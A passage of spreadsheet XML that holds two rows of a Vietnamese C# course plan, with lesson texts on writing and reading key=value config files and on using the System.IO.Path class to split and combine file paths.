- Mở `StreamWriter` chỉ với đường dẫn là ghi đè: nội dung cũ bị xóa ngay khi mở.
- `append: true` giữ nội dung cũ và ghi thêm vào cuối tệp.
- Ghi nối hợp với nhật ký, ghi đè hợp với tệp cấu hình hoặc trạng thái hiện tại.
- Luôn dùng `using` để dữ liệu được ghi xuống tệp và tệp được đóng.</t>
        </is>
      </c>
    </row>
    <row r="39" ht="409.6" customHeight="1" s="18">
      <c r="A39" s="10" t="n">
        <v>39</v>
      </c>
      <c r="B39" s="10" t="inlineStr">
        <is>
          <t>4. Đọc và Ghi File Văn bản</t>
        </is>
      </c>
      <c r="C39" s="10" t="inlineStr">
        <is>
          <t>Ghi File Văn bản</t>
        </is>
      </c>
      <c r="D39" s="10" t="inlineStr">
        <is>
          <t>Thực hành tạo file cấu hình đơn giản</t>
        </is>
      </c>
      <c r="E39" s="10" t="inlineStr">
        <is>
          <t>Bài đọc</t>
        </is>
      </c>
      <c r="F39" s="13" t="inlineStr">
        <is>
          <t>Làm thêm nếu muốn</t>
        </is>
      </c>
      <c r="G39" s="16" t="inlineStr">
        <is>
          <t>Done</t>
        </is>
      </c>
      <c r="H39" s="10" t="inlineStr">
        <is>
          <t>Lưu cấu hình dạng key=value ra tệp và đọc lại thành Dictionary.</t>
        </is>
      </c>
      <c r="I39" s="10" t="inlineStr">
        <is>
          <t>1 cột, 2 tab</t>
        </is>
      </c>
      <c r="J39" s="10" t="inlineStr">
        <is>
          <t>Tủ ngăn Dictionary bên trái ↔ tệp config.txt bên phải; mũi tên nối từng cặp với từng dòng. Dòng ghi chú và dòng sai định dạng tô xám 'bỏ qua'.</t>
        </is>
      </c>
      <c r="K39" s="10" t="inlineStr">
        <is>
          <t>H02, H12</t>
        </is>
      </c>
      <c r="L39" s="10" t="inlineStr">
        <is>
          <t>Ghi cấu hình | Đọc cấu hình</t>
        </is>
      </c>
      <c r="M39" s="10" t="inlineStr">
        <is>
          <t>Ghi: foreach (var kv in settings) WriteLine($"{kv.Key}={kv.Value}") → 3 dòng.
Đọc: ReadAllLines; dòng "# Cấu hình" bắt đầu bằng # → bỏ qua.
Dòng "theme=dark" → Split('=', 2) → ["theme", "dark"] → thêm vào Dictionary.
Dòng "url=https://a.vn/?x=1" → Split('=', 2) giữ nguyên phần sau dấu = đầu tiên.
Dòng "abc" không có '=' → bỏ qua. Xong.</t>
        </is>
      </c>
      <c r="N39" s="10" t="inlineStr">
        <is>
          <t>theme=dark, fontSize=14, url=https://a.vn/?x=1</t>
        </is>
      </c>
      <c r="O39" s="10" t="inlineStr">
        <is>
          <t>Ghi và đọc phải cùng một quy ước định dạng.</t>
        </is>
      </c>
      <c r="P39" s="10" t="inlineStr">
        <is>
          <t>Split('=', 2) chỉ tách ở dấu '=' đầu tiên để giá trị được phép chứa '='.</t>
        </is>
      </c>
      <c r="Q39" s="10" t="inlineStr">
        <is>
          <t>c-sharp-ung-dung/doc-va-ghi-file-van-ban/ghi-file-van-ban/thuc-hanh-tao-file-cau-hinh-don-gian/index.html</t>
        </is>
      </c>
      <c r="R39" s="10" t="inlineStr">
        <is>
          <t>https://codegym-vn.github.io/programming-course-demos/c-sharp-ung-dung/doc-va-ghi-file-van-ban/ghi-file-van-ban/thuc-hanh-tao-file-cau-hinh-don-gian/</t>
        </is>
      </c>
      <c r="S39" s="10" t="n"/>
      <c r="T39" s="12" t="n"/>
      <c r="U39" s="12" t="n"/>
      <c r="V39" s="21" t="inlineStr">
        <is>
          <t>Xây dựng hệ thống cấu hình bằng file văn bản
Trong các bài học trước, chúng ta đã nắm vững cách sử dụng StreamWriter để ghi dữ liệu văn bản. Một trong những ứng dụng thực tế và phổ biến nhất của kỹ thuật này là tạo ra các file cấu hình (configuration files). Thay vì mã hóa cứng (hard-code) các tham số như tên người dùng, đường dẫn thư mục, hoặc cài đặt giao diện trực tiếp trong mã nguồn, việc lưu trữ chúng trong file văn bản cho phép chương trình của bạn linh hoạt và dễ tùy biến hơn.
Cấu trúc dữ liệu cho file cấu hình
Một file cấu hình đơn giản thường lưu trữ dưới dạng cặp Khóa - Giá trị (Key-Value pair). Cách định dạng phổ biến nhất là sử dụng dấu phân cách như dấu bằng (=) hoặc dấu hai chấm (:). Ví dụ, một file settings.txt có thể có nội dung như sau:
Theme=Dark
FontSize=14
AutoSave=True
Language=Vietnamese
Sử dụng cấu trúc này giúp ứng dụng dễ dàng đọc và phân tích (parse) dữ liệu khi cần tải lại các thiết lập trong lần chạy tiếp theo.
Tự động tạo file cấu hình khi khởi chạy
Một chương trình chuyên nghiệp thường sẽ kiểm tra xem file cấu hình đã tồn tại hay chưa. Nếu chưa, nó sẽ tự động tạo ra một file với các thông số mặc định. Điều này giúp nâng cao trải nghiệm người dùng, đảm bảo ứng dụng luôn có dữ liệu hợp lệ để hoạt động.
Dưới đây là ví dụ minh họa cách kiểm tra và tạo file cấu hình nếu nó chưa tồn tại:
using System;
using System.IO;
public class ConfigManager
{
    public static void InitializeConfig(string filePath)
    {
        // Kiểm tra xem file đã tồn tại chưa
        if (!File.Exists(filePath))
        {
            Console.WriteLine("File cấu hình chưa tồn tại. Đang tạo file mặc định...");
            // Sử dụng khối using để đảm bảo StreamWriter được giải phóng tài nguyên
            using (StreamWriter sw = new StreamWriter(filePath))
            {
                sw.WriteLine("Theme=Light");
                sw.WriteLine("FontSize=12");
                sw.WriteLine("AutoSave=False");
            }
            Console.WriteLine("Đã tạo file cấu hình thành công.");
        }
        else
        {
            Console.WriteLine("File cấu hình đã tồn tại.");
        }
    }
}
Lưu ý về đường dẫn và bảo mật
Khi làm việc với file cấu hình, bạn cần đặc biệt lưu ý về vị trí lưu trữ:
Đường dẫn tương đối vs Tuyệt đối: Nên sử dụng đường dẫn tương đối (so với thư mục thực thi của chương trình) để đảm bảo tính di động của ứng dụng.
Quyền truy cập: Trong môi trường Windows, nếu bạn cài đặt ứng dụng vào thư mục Program Files, chương trình có thể không có quyền ghi dữ liệu do bị hạn chế bởi hệ điều hành. Trong trường hợp đó, hãy cân nhắc lưu trữ file cấu hình tại thư mục AppData của người dùng (Environment.SpecialFolder.ApplicationData).
Tối ưu hóa việc cập nhật cấu hình
Đôi khi, người dùng muốn thay đổi cài đặt thông qua giao diện của ứng dụng. Thay vì mở file và sửa từng dòng, chiến lược hiệu quả thường là:
Đọc toàn bộ nội dung hiện tại vào bộ nhớ (ví dụ vào một Dictionary&lt;string, string&gt;).
Cập nhật các giá trị trong bộ nhớ.
Ghi đè lại toàn bộ file bằng StreamWriter với nội dung đã được cập nhật.
Mẹo nhỏ: Khi ghi file cấu hình, hãy luôn sử dụng khối using để đảm bảo StreamWriter được đóng đúng cách. Việc quên đóng luồng file có thể dẫn đến lỗi "File đang được sử dụng bởi một tiến trình khác", khiến ứng dụng của bạn gặp sự cố khi muốn truy cập file lần kế tiếp.
Bài tập suy ngẫm
Hãy tưởng tượng ứng dụng của bạn cần lưu lịch sử đăng nhập vào một file riêng biệt, trong khi file settings.txt vẫn giữ nguyên các cấu hình cài đặt. Theo bạn, sự khác biệt trong việc mở file giữa settings.txt (cần ghi đè khi cập nhật) và log.txt (cần thêm mới vào cuối file) nằm ở đâu khi khởi tạo đối tượng StreamWriter? (Gợi ý: Hãy xem lại tham số append trong hàm khởi tạo của StreamWriter).</t>
        </is>
      </c>
      <c r="W39" s="22" t="inlineStr">
        <is>
          <t># Thực hành tạo file cấu hình đơn giản
## Mục tiêu học tập
Sau bài học này, bạn có thể:
- Giải thích vì sao nên lưu thiết lập ra tệp cấu hình thay vì viết cứng (hard-code) trong mã nguồn.
- Ghi một `Dictionary&lt;string, string&gt;` ra tệp theo định dạng `key=value`, mỗi cặp một dòng.
- Đọc tệp cấu hình lại thành `Dictionary`, bỏ qua dòng ghi chú và dòng sai định dạng.
- Dùng `Split('=', 2)` để giá trị được phép chứa dấu `=`.
- Quan sát hai chiều ghi và đọc cấu hình bằng hoạt động mô phỏng.
## Tệp cấu hình là gì?
Thay vì viết cứng các thiết lập như giao diện, cỡ chữ hay địa chỉ máy chủ ngay trong mã nguồn, ta lưu chúng ở một **tệp cấu hình** (configuration file). Người dùng đổi thiết lập chỉ việc sửa tệp, không cần biên dịch lại chương trình.
Định dạng đơn giản và phổ biến là **cặp khóa - giá trị** (key-value), mỗi cặp một dòng, ngăn cách bằng dấu `=`:
```
theme=dark
fontSize=14
url=https://a.vn/?x=1
```
Chú ý dòng `url`: giá trị của nó tự chứa dấu `=`. Đây là điểm ta phải xử lý khi đọc.
Điều quan trọng nhất là **ghi và đọc phải cùng một quy ước**. Ở đây quy ước là `key=value`, mỗi cặp một dòng.
## Ghi cấu hình ra tệp
Ta giữ thiết lập trong một `Dictionary&lt;string, string&gt;`, rồi duyệt từng cặp và ghi mỗi cặp thành một dòng. Vì đây là tệp cần luôn phản ánh đúng thiết lập hiện tại, ta mở ở chế độ ghi đè (mặc định):
```csharp
using System;
using System.Collections.Generic;
using System.IO;
public class Program
{
    public static void Main()
    {
        var settings = new Dictionary&lt;string, string&gt;
        {
            ["theme"] = "dark",
            ["fontSize"] = "14",
            ["url"] = "https://a.vn/?x=1"
        };
        using var w = new StreamWriter("config.txt");
        foreach (var kv in settings)
            w.WriteLine($"{kv.Key}={kv.Value}");
    }
}
// config.txt:
// theme=dark
// fontSize=14
// url=https://a.vn/?x=1
```
Chuỗi nội suy `$"{kv.Key}={kv.Value}"` ghép khóa, dấu `=` và giá trị thành một dòng.
## Đọc cấu hình lại thành Dictionary
Khi đọc, ta đi ngược lại: đọc từng dòng, tách khóa và giá trị rồi đưa vào `Dictionary`. Tệp do người dùng sửa nên có thể có **dòng ghi chú** (bắt đầu bằng `#`) và **dòng sai định dạng** (không có dấu `=`), ta cần bỏ qua chúng.
```csharp
using System;
using System.Collections.Generic;
using System.IO;
public class Program
{
    public static void Main()
    {
        File.WriteAllText("config.txt",
            "# Cấu hình\ntheme=dark\nfontSize=14\nurl=https://a.vn/?x=1\nabc\n");
        var d = new Dictionary&lt;string, string&gt;();
        var all = File.ReadAllLines("config.txt");
        foreach (var line in all)
        {
            if (line.StartsWith("#")) continue;   // bỏ dòng ghi chú
            var p = line.Split('=', 2);           // tách ở dấu = đầu tiên
            if (p.Length &lt; 2) continue;           // bỏ dòng sai định dạng
            d[p[0]] = p[1];
        }
        foreach (var kv in d)
            Console.WriteLine($"{kv.Key} -&gt; {kv.Value}");
        // theme -&gt; dark
        // fontSize -&gt; 14
        // url -&gt; https://a.vn/?x=1
    }
}
```
`Split('=', 2)` tách **tối đa 2 phần**, nên chỉ cắt ở dấu `=` đầu tiên. Nhờ đó `url=https://a.vn/?x=1` cho ra `["url", "https://a.vn/?x=1"]` và dấu `=` thứ hai vẫn nằm trong giá trị. Nếu một dòng như `abc` không có dấu `=`, `Split` chỉ cho ra 1 phần tử, nên `p.Length &lt; 2` và dòng bị bỏ qua.
## Hoạt động: Ghi rồi đọc lại cấu hình
Mô phỏng dưới đây có hai tab, tương ứng hai đoạn mã ở trên. Hãy thao tác theo thứ tự sau, bấm **Bước tiếp** để chạy từng dòng:
- Mở tab **Ghi cấu hình**. Bên trái là `Dictionary` settings gồm 3 cặp `theme`, `fontSize`, `url`, bên phải là tệp `config.txt`, lúc đầu rỗng. Mỗi bước ghi một cặp: ô cặp đó sáng lên và một dòng mới màu xanh xuất hiện trong tệp, lần lượt `theme=dark`, `fontSize=14`, `url=https://a.vn/?x=1`. Cuối cùng tệp có 3 dòng dạng `key=value`.
- Chuyển sang tab **Đọc cấu hình**. Bên trái là tệp `config.txt` có 5 dòng, bên phải là `Dictionary` d còn trống. Dòng `# Cấu hình` bắt đầu bằng `#` nên bị bỏ qua. Dòng `theme=dark` và `fontSize=14` được `Split('=', 2)` tách thành hai phần rồi thêm vào d.
- Bấm tiếp tới dòng `url=https://a.vn/?x=1`. Vì tách tối đa 2 phần, giá trị `https://a.vn/?x=1` giữ nguyên cả dấu `=` thứ hai.
- Bấm dòng `abc`. Dòng này không có dấu `=`, `p.Length &lt; 2` nên bị bỏ qua. Kết quả cuối: `Dictionary` có 3 cặp, hai dòng (ghi chú và sai định dạng) đã bị bỏ qua.
```
&lt;iframe src="https://codegym-vn.github.io/programming-course-demos/c-sharp-ung-dung/doc-va-ghi-file-van-ban/ghi-file-van-ban/thuc-hanh-tao-file-cau-hinh-don-gian/" title="Tạo file cấu hình đơn giản" style="border:0;" allowfullscreen&gt;&lt;/iframe&gt;
```
Điều rút ra: ghi và đọc phải cùng một quy ước định dạng. `Split('=', 2)` giúp giá trị được phép chứa dấu `=`, còn việc bỏ qua dòng ghi chú và dòng sai định dạng làm chương trình đọc tệp ổn định hơn.
## Một vài lưu ý thực tế
- **Tạo tệp mặc định:** khi khởi chạy, chương trình có thể kiểm tra `File.Exists(path)`, nếu chưa có thì tạo tệp với các thiết lập mặc định.
- **Cập nhật cấu hình:** đọc cả tệp vào `Dictionary`, sửa giá trị trong bộ nhớ, rồi ghi đè lại toàn bộ tệp bằng `StreamWriter`.
- **Vị trí tệp:** nên dùng đường dẫn tương đối so với thư mục chạy của chương trình. Trên Windows, nếu cài vào `Program Files` thì chương trình có thể không có quyền ghi; khi đó hãy lưu vào thư mục `Environment.SpecialFolder.ApplicationData` của người dùng.
- **Đóng tệp:** luôn dùng `using` để tránh lỗi "tệp đang được sử dụng bởi một tiến trình khác".
## Tóm tắt
- Tệp cấu hình giúp đổi thiết lập mà không phải sửa mã nguồn.
- Định dạng đơn giản là `key=value`, mỗi cặp một dòng.
- Ghi: duyệt `Dictionary` và `WriteLine($"{kv.Key}={kv.Value}")`, mở ở chế độ ghi đè.
- Đọc: bỏ dòng ghi chú `#`, dùng `Split('=', 2)`, bỏ dòng có `p.Length &lt; 2`, rồi gán `d[p[0]] = p[1]`.
- Ghi và đọc phải cùng một quy ước định dạng.</t>
        </is>
      </c>
    </row>
    <row r="40" ht="409.6" customHeight="1" s="18">
      <c r="A40" s="10" t="n">
        <v>40</v>
      </c>
      <c r="B40" s="10" t="inlineStr">
        <is>
          <t>4. Đọc và Ghi File Văn bản</t>
        </is>
      </c>
      <c r="C40" s="10" t="inlineStr">
        <is>
          <t>Quản lý Đường dẫn và Thư mục</t>
        </is>
      </c>
      <c r="D40" s="10" t="inlineStr">
        <is>
          <t>Lớp Path: Thao tác với đường dẫn file</t>
        </is>
      </c>
      <c r="E40" s="10" t="inlineStr">
        <is>
          <t>Bài đọc</t>
        </is>
      </c>
      <c r="F40" s="11" t="inlineStr">
        <is>
          <t>Nên làm</t>
        </is>
      </c>
      <c r="G40" s="16" t="inlineStr">
        <is>
          <t>Done</t>
        </is>
      </c>
      <c r="H40" s="10" t="inlineStr">
        <is>
          <t>Tách và ghép đường dẫn an toàn bằng Path thay vì cộng chuỗi.</t>
        </is>
      </c>
      <c r="I40" s="10" t="inlineStr">
        <is>
          <t>1 cột, 3 tab</t>
        </is>
      </c>
      <c r="J40" s="10" t="inlineStr">
        <is>
          <t>Đường dẫn hiển thị như dãy chip: ổ đĩa | thư mục | thư mục | tên tệp | phần mở rộng. Mỗi phương thức tô các chip mà nó trả về.</t>
        </is>
      </c>
      <c r="K40" s="10" t="inlineStr">
        <is>
          <t>H14</t>
        </is>
      </c>
      <c r="L40" s="10" t="inlineStr">
        <is>
          <t>Tách đường dẫn | Ghép đường dẫn | Đổi phần mở rộng</t>
        </is>
      </c>
      <c r="M40" s="10" t="inlineStr">
        <is>
          <t>Tách: C:\Data\Reports\bao-cao.txt → GetDirectoryName = C:\Data\Reports; GetFileName = bao-cao.txt; GetFileNameWithoutExtension = bao-cao; GetExtension = .txt.
Ghép: "Data" + "Reports" → "DataReports" (sai, thiếu dấu phân cách); Path.Combine("Data", "Reports", "a.txt") → Data\Reports\a.txt.
Ghép với đường dẫn tuyệt đối: Path.Combine("Data", @"C:\Temp") → C:\Temp (phần trước bị bỏ).
Đổi đuôi: Path.ChangeExtension("bao-cao.txt", ".csv") → bao-cao.csv (chỉ đổi chuỗi, không đổi tệp thật).
Bước cuối mỗi tab: kết quả.</t>
        </is>
      </c>
      <c r="N40" s="10" t="inlineStr">
        <is>
          <t>C:\Data\Reports\bao-cao.txt</t>
        </is>
      </c>
      <c r="O40" s="10" t="inlineStr">
        <is>
          <t>Path xử lý dấu phân cách và các trường hợp đặc biệt thay cho việc cộng chuỗi.</t>
        </is>
      </c>
      <c r="P40" s="10" t="inlineStr">
        <is>
          <t>Ví dụ dùng đường dẫn kiểu Windows; trên macOS/Linux dấu phân cách là '/', Path.Combine tự dùng Path.DirectorySeparatorChar.</t>
        </is>
      </c>
      <c r="Q40" s="10" t="inlineStr">
        <is>
          <t>c-sharp-ung-dung/doc-va-ghi-file-van-ban/quan-ly-duong-dan-va-thu-muc/lop-path-thao-tac-voi-duong-dan-file/index.html</t>
        </is>
      </c>
      <c r="R40" s="10" t="inlineStr">
        <is>
          <t>https://codegym-vn.github.io/programming-course-demos/c-sharp-ung-dung/doc-va-ghi-file-van-ban/quan-ly-duong-dan-va-thu-muc/lop-path-thao-tac-voi-duong-dan-file/</t>
        </is>
      </c>
      <c r="S40" s="10" t="n"/>
      <c r="T40" s="12" t="n"/>
      <c r="U40" s="12" t="n"/>
      <c r="V40" s="21" t="inlineStr">
        <is>
          <t>Giới thiệu về Lớp Path: Người bạn của đường dẫn file
Trong quá trình phát triển ứng dụng, việc thao tác với file và thư mục là một kỹ năng thiết yếu. Tuy nhiên, đường dẫn file thường là các chuỗi ký tự phức tạp, dễ gây lỗi nếu không được xử lý cẩn thận. Sự khác biệt giữa các hệ điều hành (ví dụ: dấu \ trên Windows và dấu / trên Linux/macOS) càng làm cho việc này trở nên rắc rối hơn.
Lớp System.IO.Path trong C# được sinh ra để giải quyết những thách thức này. Đây là một lớp tĩnh (static class) cung cấp các phương thức tiện ích để thực hiện các thao tác trên chuỗi đường dẫn file hoặc thư mục. Điều quan trọng cần nhớ là lớp Pathkhông thực hiện các thao tác trên hệ thống file thực tế (như tạo, xóa, kiểm tra sự tồn tại của file/thư mục). Thay vào đó, nó chuyên về việc phân tích, kết hợp, và chuẩn hóa các chuỗi đường dẫn, giúp bạn xây dựng các đường dẫn hợp lệ và trích xuất thông tin từ chúng một cách an toàn và độc lập với hệ điều hành.
Việc sử dụng Path giúp code của bạn trở nên mạnh mẽ hơn, dễ đọc hơn và ít gặp lỗi hơn khi làm việc với đường dẫn, đặc biệt là trong các ứng dụng cần tính di động cao.
Tạo Đường dẫn An toàn với Path.Combine()
Một trong những vấn đề phổ biến nhất khi làm việc với đường dẫn là nối các phần của đường dẫn lại với nhau. Nếu bạn nối chuỗi thủ công, bạn có thể dễ dàng gặp phải các lỗi như:
Thiếu dấu phân cách (separator) giữa các phần.
Thừa dấu phân cách (hai dấu \ hoặc / liên tiếp).
Sử dụng sai dấu phân cách cho hệ điều hành hiện tại.
Phương thức tĩnh Path.Combine() là giải pháp hoàn hảo cho vấn đề này. Nó nhận nhiều chuỗi làm đối số và kết hợp chúng thành một đường dẫn duy nhất, tự động xử lý các dấu phân cách một cách chính xác, đảm bảo đường dẫn kết quả luôn hợp lệ cho hệ điều hành đang chạy.
using System;
using System.IO;
public class PathCombineExample
{
    public static void Main(string[] args)
    {
        string thuMucGoc = "Data";
        string thuMucCon = "Reports";
        string tenFile = "Sales.txt";
        // Nối chuỗi thủ công (có thể gây lỗi)
        // string duongDanSai = thuMucGoc + "/" + thuMucCon + "\\" + tenFile; // Hỗn loạn dấu phân cách
        // Sử dụng Path.Combine() để tạo đường dẫn an toàn
        string duongDanDayDu = Path.Combine(thuMucGoc, thuMucCon, tenFile);
        Console.WriteLine($"Đường dẫn đầy đủ: {duongDanDayDu}");
        // Ví dụ với các đường dẫn đã có dấu phân cách
        string phan1 = @"C:\Users\Admin";
        string phan2 = "Documents";
        string phan3 = @"MyFiles\"; // Kết thúc bằng dấu phân cách
        string phan4 = "Image.png";
        string duongDanKetHop = Path.Combine(phan1, phan2, phan3, phan4);
        Console.WriteLine($"Đường dẫn kết hợp: {duongDanKetHop}");
        // Kết quả có thể khác nhau tùy thuộc vào hệ điều hành
        // Windows: C:\Users\Admin\Documents\MyFiles\Image.png
        // Linux/macOS: C:/Users/Admin/Documents/MyFiles/Image.png
    }
}
Trong ví dụ trên, Path.Combine() tự động thêm hoặc loại bỏ các dấu phân cách cần thiết và sử dụng dấu phân cách chuẩn của hệ điều hành. Điều này giúp code của bạn hoạt động đáng tin cậy trên nhiều môi trường khác nhau.
Trích xuất Thông tin từ Đường dẫn
Ngoài việc kết hợp đường dẫn, lớp Path còn cung cấp nhiều phương thức hữu ích để phân tích và trích xuất các phần khác nhau của một đường dẫn. Điều này rất tiện lợi khi bạn cần lấy tên file, phần mở rộng, hoặc tên thư mục chứa nó mà không cần phải tự mình phân tích chuỗi.
Dưới đây là một số phương thức phổ biến:
Path.GetFileName(string path): Trả về tên file và phần mở rộng từ đường dẫn.
Path.GetFileNameWithoutExtension(string path): Trả về tên file mà không có phần mở rộng.
Path.GetExtension(string path): Trả về phần mở rộng của file (bao gồm dấu chấm .).
Path.GetDirectoryName(string path): Trả về đường dẫn của thư mục cha chứa file hoặc thư mục được chỉ định.
Path.GetFullPath(string path): Trả về đường dẫn tuyệt đối của đường dẫn được cung cấp. Điều này hữu ích để chuẩn hóa các đường dẫn tương đối.
Path.HasExtension(string path): Kiểm tra xem đường dẫn có chứa phần mở rộng file hay không.
Hãy xem một ví dụ minh họa:
using System;
using System.IO;
public class PathExtractionExample
{
    public static void Main(string[] args)
    {
        string duongDanFile = @"C:\Users\Public\Documents\MyReport.pdf";
        string duongDanThuMuc = @"D:\Projects\CSharpApp";
        string duongDanTuongDoi = @"..\Relative\file.txt";
        Console.WriteLine($"Đường dẫn gốc: {duongDanFile}");
        Console.WriteLine($"  Tên file (bao gồm mở rộng): {Path.GetFileName(duongDanFile)}");
        Console.WriteLine($"  Tên file (không mở rộng): {Path.GetFileNameWithoutExtension(duongDanFile)}");
        Console.WriteLine($"  Phần mở rộng: {Path.GetExtension(duongDanFile)}");
        Console.WriteLine($"  Tên thư mục cha: {Path.GetDirectoryName(duongDanFile)}");
        Console.WriteLine($"  Có mở rộng không?: {Path.HasExtension(duongDanFile)}");
        Console.WriteLine($"  Đường dẫn đầy đủ (tuyệt đối): {Path.GetFullPath(duongDanFile)}");
        Console.WriteLine("\n--- Với đường dẫn thư mục ---");
        Console.WriteLine($"Đường dẫn gốc: {duongDanThuMuc}");
        Console.WriteLine($"  Tên thư mục cha: {Path.GetDirectoryName(duongDanThuMuc)}"); // Trả về D:\Projects
        Console.WriteLine($"  Tên file (trên thư mục): {Path.GetFileName(duongDanThuMuc)}"); // Trả về CSharpApp
        Console.WriteLine($"  Có mở rộng không?: {Path.HasExtension(duongDanThuMuc)}"); // Trả về False
        Console.WriteLine("\n--- Với đường dẫn tương đối ---");
        Console.WriteLine($"Đường dẫn gốc: {duongDanTuongDoi}");
        Console.WriteLine($"  Đường dẫn đầy đủ (tuyệt đối): {Path.GetFullPath(duongDanTuongDoi)}");
        // Kết quả của GetFullPath sẽ phụ thuộc vào thư mục hiện hành của ứng dụng.
        // Ví dụ: Nếu ứng dụng chạy từ C:\MyApp, thì kết quả có thể là C:\MyApp\Relative\file.txt
    }
}
Các phương thức này không chỉ giúp bạn tránh các lỗi phân tích chuỗi thủ công mà còn tăng cường tính rõ ràng và khả năng bảo trì cho code của bạn.
Lợi ích của Lớp Path so với Nối Chuỗi Thủ công
Việc sử dụng lớp Path mang lại nhiều lợi ích đáng kể so với việc tự mình nối hoặc phân tích chuỗi đường dẫn:
Tính di động (Portability):Path tự động xử lý sự khác biệt về dấu phân cách đường dẫn giữa các hệ điều hành (ví dụ: \ trên Windows và / trên Unix/Linux/macOS). Điều này có nghĩa là code của bạn sẽ hoạt động chính xác trên mọi nền tảng mà không cần thay đổi.
Độ tin cậy và chính xác: Giảm thiểu đáng kể nguy cơ xảy ra lỗi do thiếu hoặc thừa dấu phân cách khi kết hợp đường dẫn, hoặc lỗi khi trích xuất thông tin do định dạng đường dẫn không chuẩn.
Dễ đọc và bảo trì: Code sử dụng các phương thức của Path thể hiện rõ ràng mục đích hơn so với việc thao tác chuỗi trực tiếp. Điều này giúp các nhà phát triển khác (hoặc chính bạn trong tương lai) dễ dàng hiểu và bảo trì code.
An toàn (gián tiếp): Bằng cách đảm bảo các đường dẫn luôn được định dạng đúng và hợp lệ, Path giúp giảm thiểu các lỗ hổng tiềm ẩn có thể phát sinh từ đường dẫn bị lỗi hoặc không mong muốn. Mặc dù nó không phải là một lớp bảo mật trực tiếp, nhưng nó góp phần vào việc tạo ra các đường dẫn an toàn hơn để tương tác với hệ thống file.
Tóm lại, lớp Path là một công cụ không thể thiếu khi bạn cần làm việc với đường dẫn file và thư mục trong các ứng dụng C#. Nó giúp bạn viết code mạnh mẽ, linh hoạt và dễ bảo trì hơn, tránh xa những rắc rối của việc xử lý chuỗi đường dẫn thủ công.</t>
        </is>
      </c>
      <c r="W40" s="22" t="inlineStr">
        <is>
          <t># Lớp Path: Thao tác với đường dẫn file
## Mục tiêu học tập
Sau bài học này, bạn có thể:
- Giải thích lớp `Path` chỉ xử lý **chuỗi** đường dẫn, không tạo, xóa hay kiểm tra tệp thật.
- Tách một đường dẫn bằng `GetDirectoryName`, `GetFileName`, `GetFileNameWithoutExtension` và `GetExtension`.
- Ghép đường dẫn an toàn bằng `Path.Combine` thay vì cộng chuỗi.
- Nhận ra `Path.Combine` bỏ các phần đứng trước khi gặp một đường dẫn tuyệt đối.
- Quan sát ba thao tác tách, ghép và đổi phần mở rộng bằng hoạt động mô phỏng.
## Lớp Path là gì?
Đường dẫn tệp là một chuỗi, và rất dễ sai khi tự xử lý: thiếu hay thừa dấu phân cách, hoặc dùng sai dấu cho hệ điều hành (Windows dùng `\`, còn Linux và macOS dùng `/`).
`System.IO.Path` là một **lớp tĩnh** (static class) chuyên phân tích, ghép và chuẩn hóa chuỗi đường dẫn. Lưu ý quan trọng: `Path` **chỉ làm việc với chuỗi**. Nó không tạo, xóa, di chuyển hay kiểm tra tệp có tồn tại không. Việc đó thuộc về `File` và `Directory`.
&gt; **Lưu ý:** Các ví dụ trong bài dùng đường dẫn kiểu Windows (`C:\...`). Trên macOS hoặc Linux, dấu `\` không phải dấu phân cách nên kết quả sẽ khác.
## Tách đường dẫn
Giả sử có đường dẫn:
```csharp
string p = @"C:\Data\Reports\bao-cao.txt";
```
Nó gồm 5 phần: ổ đĩa `C:\`, hai thư mục `Data\` và `Reports\`, tên tệp `bao-cao` và phần mở rộng `.txt`. Mỗi phương thức của `Path` trả về một phần:
| Phương thức | Trả về | Với `p` ở trên |
|---|---|---|
| `Path.GetDirectoryName(p)` | Thư mục chứa tệp (mọi thứ trước tên tệp) | `C:\Data\Reports` |
| `Path.GetFileName(p)` | Tên tệp kèm phần mở rộng | `bao-cao.txt` |
| `Path.GetFileNameWithoutExtension(p)` | Tên tệp, bỏ phần mở rộng | `bao-cao` |
| `Path.GetExtension(p)` | Phần mở rộng, có cả dấu chấm | `.txt` |
```csharp
using System;
using System.IO;
public class Program
{
    public static void Main()
    {
        string p = @"C:\Data\Reports\bao-cao.txt";
        Console.WriteLine(Path.GetDirectoryName(p));              // C:\Data\Reports
        Console.WriteLine(Path.GetFileName(p));                   // bao-cao.txt
        Console.WriteLine(Path.GetFileNameWithoutExtension(p));   // bao-cao
        Console.WriteLine(Path.GetExtension(p));                  // .txt
    }
}
```
Ngoài ra còn `Path.HasExtension(p)` để kiểm tra đường dẫn có phần mở rộng không, và `Path.GetFullPath(p)` để đổi đường dẫn tương đối thành tuyệt đối dựa theo thư mục hiện hành.
## Ghép đường dẫn bằng Path.Combine
Nối đường dẫn bằng dấu `+` rất dễ lỗi:
```csharp
var bad = "Data" + "Reports";                            // "DataReports": dính liền, thiếu dấu phân cách
var ok = Path.Combine("Data", "Reports", "a.txt");       // Data\Reports\a.txt
```
`Path.Combine` tự chèn dấu phân cách đúng của hệ điều hành giữa các phần, và không chèn thừa nếu phần đứng trước đã kết thúc bằng dấu phân cách.
### Gặp đường dẫn tuyệt đối
`Path.Combine` có một quy tắc dễ gây bất ngờ: nếu một phần là **đường dẫn tuyệt đối**, các phần đứng trước nó bị bỏ.
```csharp
var abs = Path.Combine("Data", @"C:\Temp");   // C:\Temp (phần "Data" bị bỏ)
```
Vì vậy, đừng đưa dữ liệu người dùng nhập vào làm phần sau của `Path.Combine` mà không kiểm tra, vì một đường dẫn tuyệt đối có thể "nhảy" ra ngoài thư mục bạn định dùng.
## Đổi phần mở rộng
`Path.ChangeExtension(path, newExtension)` thay phần mở rộng trong chuỗi đường dẫn:
```csharp
var name = "bao-cao.txt";
var csv = Path.ChangeExtension(name, ".csv");   // "bao-cao.csv"
```
Điều cần nhớ: phương thức này chỉ **tạo ra một chuỗi mới**. Tệp `bao-cao.txt` thật trên đĩa vẫn giữ nguyên tên. Muốn đổi tên tệp thật, phải dùng lệnh khác như `File.Move`.
## Hoạt động: Tách, ghép và đổi đuôi
Mô phỏng dưới đây dùng đường dẫn kiểu Windows. Hãy thao tác theo thứ tự sau, bấm **Bước tiếp** để chạy từng dòng:
- Mở tab **Tách đường dẫn**. Đường dẫn `p` được chia thành 5 chip: ổ đĩa `C:\`, thư mục `Data\`, thư mục `Reports\`, tên tệp `bao-cao` và đuôi `.txt`. Mỗi lần gọi một phương thức, các chip màu vàng cho thấy phần được trả về: `GetDirectoryName` ra `C:\Data\Reports`, `GetFileName` ra `bao-cao.txt`, `GetFileNameWithoutExtension` ra `bao-cao`, `GetExtension` ra `.txt`.
